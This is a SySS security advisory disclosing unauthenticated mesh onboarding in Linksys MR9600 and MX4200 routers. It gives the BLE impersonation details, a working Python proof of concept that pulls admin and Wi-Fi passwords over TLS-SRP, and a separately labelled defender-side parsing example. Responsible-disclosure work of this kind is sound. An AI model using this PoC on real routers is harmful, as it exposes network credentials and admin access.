Advisory ID: SYSS-2025-002
Product: MR9600, MX4200 (and potentially others)
Manufacturer: Linksys
Affected Version(s): 1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200
                     (and potentially others)
Tested Version(s): 1.0.4.205530 for MR9600, 1.0.13.210200 for MX4200
Vulnerability Type: Missing Authentication for Critical Function (CWE-306)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2025-03-18
Solution Date: -
Public Disclosure: 2026-02-12
CVE Reference: Not yet assigned
Author of Advisory: Christian Zäske, SySS GmbH
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Overview:
Linksys MX4200 is a Wi-Fi mesh router targeting home users.
The manufacturer describes the product as follows (see [1]):
"This router supports the latest Wi-Fi® 6 (802.11ax) standard for
next-level streaming and gaming. Its powerful WiFi 6 mesh coverage offers
faster WiFi performance for lag-free online gaming and simultaneous
streaming to every device and corner of your home."
Due to missing authentication, a user with physical access to the device
can misuse the mesh functionality to add a new mesh device to the network
and thereby gain access to sensitive information, including the password
for admin access to the web interface and the Wi-Fi passwords.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vulnerability Details:
The Linksys MX4200 (and other models) provides the functionality to add
other devices to the mesh network. One method to add such a device uses a
Bluetooth connection initiated by pressing the reset button quickly five
times. This makes the router search for nearby Bluetooth Low Energy (BLE)
devices with specific services and characteristics. After such a device
is found, the router will connect to it and send credentials for a hidden
Wi-Fi network as well as a TLS-SRP username and password.
This information can be used to connect to the hidden Wi-Fi network and
to a service running on TCP port 6060, which accepts a TLS-SRP connection
using the given credentials. By sending a binary hello message, followed
by a so-called "sync request", the service will answer with sensitive
data, including the password for admin access to the web interface and
the Wi-Fi passwords.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Proof of Concept (PoC):
To be recognized as a Linksys mesh device over BLE, the correct data has
to be advertised. This includes the following:
- Flags: 0x06
- Manufacturer specific data: 0x5C00 0x0000
- Complete list of service class UUIDs: 00002080-8eab-46c2-b788-0e9440016fd1
- Complete local name: Linksys
Additionally, the following service has to be present with the specified
characteristics:
Service UUID: 00002080-8eab-46c2-b788-0e9440016fd1
Characteristics 1:
UUID: 00002081-8eab-46c2-b788-0e9440016fd1
Properties: READ, WRITE, NOTIFY
Permissions: READABLE, WRITABLE
Characteristics 2:
UUID: 00002082-8eab-46c2-b788-0e9440016fd1
Properties: READ, WRITE, NOTIFY
Permissions: READABLE, WRITABLE
After the reset button on the MX4200 is pressed quickly five times,
it will connect to the advertising device and write the data containing
the SSID and passphrase of the hidden Wi-Fi network as well as the
TLS-SRP username and password into the second characteristic.
After this data is received and a Wi-Fi connection to the hidden
network is established, the following Python code, using the
"tlslite-ng" library, can be used to connect to the service running on
TCP port 6060 and to send the sync request:
import json
import socket
from tlslite.api import TLSConnection

# TLS-SRP credentials as written by the router into the second BLE
# characteristic (placeholders, to be filled in)
srp_username = "<SRP username received via BLE>"
srp_pass = "<SRP password received via BLE>"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.1.1", 6060))
conn = TLSConnection(sock)
conn.handshakeClientSRP(srp_username, srp_pass)
# binary hello message
conn.sendall(bytes.fromhex("4f53435479e0b43120fcf435000000600000"))
# sync request
conn.sendall(('{"version": "0.1", "type": "sync_request", "client_id": '
              '"FBFA9E31-BE8C-4B63-A0BE-E89F80B304EA"}').encode('utf8'))
# read the complete response as a hex string
data = ""
msg = conn.recv(1024)
while msg:
    data = data + msg.hex()
    msg = conn.recv(1024)
# strip the 18-byte binary header and the trailing byte, then decode JSON
data = bytes.fromhex(data[36:-2])
data = data.decode("utf8")
json_data = json.loads(data)
print(json.dumps(json_data, indent=2))
The returned data is shown below (abridged):
{
"ADMIN": {
"syscfg": [
{
"device::admin_password": "AdminPassword+1"
}
],
[...]
},
"WLAN": {
"syscfg": [
{
"device::wps_pin": "63091700"
},
[...]
{
"wl0_passphrase": "WiFiPassword"
},
{
"wl0_security_mode": "wpa2-personal"
},
{
"wl0_ssid": "LinksysRD"
},
[...]
],
},
[...]
}
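To make the exposure concrete from the defender's side, the following added example (not part of this advisory and not Linksys code) parses a sync response frame using the framing from the PoC above (18-byte header, UTF-8 JSON body, one trailing byte) and lists or redacts the secret-bearing syscfg entries. The sample frame and its header bytes are constructed, and the set of sensitive key suffixes is an assumption based on the keys shown above.

```python
import json
import re

HEADER_LEN = 18   # binary header before the JSON body (the PoC's hex slice [36:-2])
TRAILER_LEN = 1   # single byte after the JSON body
# Assumption: key suffixes that carry secrets, taken from the keys visible above
SENSITIVE_KEY = re.compile(r"(admin_password|_passphrase|wps_pin)$")


def parse_sync_frame(frame: bytes) -> dict:
    """Strip the framing and return the decoded sync response as a dict."""
    if len(frame) < HEADER_LEN + TRAILER_LEN + 2:
        raise ValueError("frame too short to contain a JSON body")
    body = frame[HEADER_LEN:len(frame) - TRAILER_LEN]
    return json.loads(body.decode("utf8"))


def _syscfg_entries(sync: dict):
    """Yield (section, entry) for every single-key dict in a section's 'syscfg' list."""
    for section, content in sync.items():
        if isinstance(content, dict):
            for entry in content.get("syscfg", []):
                yield section, entry


def find_exposed_secrets(sync: dict) -> dict:
    """Map 'SECTION/key' -> value for each secret-bearing syscfg entry."""
    return {f"{section}/{key}": value
            for section, entry in _syscfg_entries(sync)
            for key, value in entry.items() if SENSITIVE_KEY.search(key)}


def redact_sync(sync: dict) -> dict:
    """Return a deep copy safe for logging, with secret values replaced."""
    safe = json.loads(json.dumps(sync))
    for _section, entry in _syscfg_entries(safe):
        for key in [k for k in entry if SENSITIVE_KEY.search(k)]:
            entry[key] = "<redacted>"
    return safe


# Constructed sample: dummy 18-byte header, body shaped like the response above, one trailing byte
_SAMPLE_BODY = {
    "ADMIN": {"syscfg": [{"device::admin_password": "AdminPassword+1"}]},
    "WLAN": {"syscfg": [{"device::wps_pin": "63091700"}, {"wl0_passphrase": "WiFiPassword"},
                        {"wl0_security_mode": "wpa2-personal"}, {"wl0_ssid": "LinksysRD"}]},
}
SAMPLE_FRAME = b"OSCT" + b"\x00" * 14 + json.dumps(_SAMPLE_BODY).encode("utf8") + b"\x00"

if __name__ == "__main__":
    for name in find_exposed_secrets(parse_sync_frame(SAMPLE_FRAME)):
        print("secret exposed by sync_response:", name)
```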
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Solution:
There is no known solution yet.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclosure Timeline:
2024-11-11: Vulnerability discovered
2025-03-18: Vulnerability reported to manufacturer
2025-04-07: First response from manufacturer
2025-04-14: Requested an update from manufacturer
2025-05-06: Acknowledgment of vulnerabilities by the manufacturer
2025-06-24: Manufacturer information: vulnerability will not receive fix
2026-02-12: Public disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
References:
[1] Product website for Linksys MX4200
https://support.linksys.com/kb/article/952-en/
[2] SySS Security Advisory SYSS-2025-002
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-002.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Credits:
This security vulnerability was found by Christian Zäske of SySS
GmbH.
E-Mail: [email protected]
Public Key:
https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Zaeske.asc
Key ID: 0x7B00D164A32F9AC9
Key Fingerprint: 51D4 6E9B 3C29 7347 AC01 0F5A 7B00 D164 A32F 9AC9
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Disclaimer:
The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright:
Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en